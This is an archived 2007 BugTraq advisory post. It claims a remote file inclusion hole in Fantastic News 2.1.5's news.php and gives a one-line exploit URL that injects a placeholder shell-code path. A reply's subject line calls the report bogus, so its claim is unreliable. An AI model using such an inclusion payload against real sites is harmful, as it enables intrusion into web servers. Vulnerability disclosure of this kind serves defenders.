BugTraq
Fantastic News <=- (news.php) Remote File Include Vulnerability Jan 21 2007 12:42PM
me you (r 5 7 hotmail com) (1 replies)
#######################################################

Fantastic News <=- (news.php) Remote File Include Vulnerability ...

Script: Fantastic News

Version: 2.1.5

URL : http://fscripts.com/download.php?file=1

Author: BorN To K!LL

#######################################################

Bug in :. news.php

code :
require_once($CONFIG['script_path']."functions/functions.php");
require_once($CONFIG['script_path']."functions/mysql.php");
require_once($CONFIG['script_path']."functions/template.php");

#######################################################

Explo!t :.
/news.php?CONFIG['script_path']=[SHe1L-Code]

#######################################################

GreeTz to :.

Dr.2 , Asbmay , General C , ToOoFa , SHiKaA , str0ke ,
ThE-LoRd-Of-CrAcKiNg .....

#######################################################

_________________________________________________________________
FREE pop-up blocking with the new MSN Toolbar - get it now!
http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/

[ reply ]
Re: Fantastic News <=- (news.php) Remote File Include Vulnerability <- bogus... again Jan 23 2007 12:15AM
Mailinglists Address (mailinglist expresshosting net)


 

Privacy Statement
Copyright 2010, SecurityFocus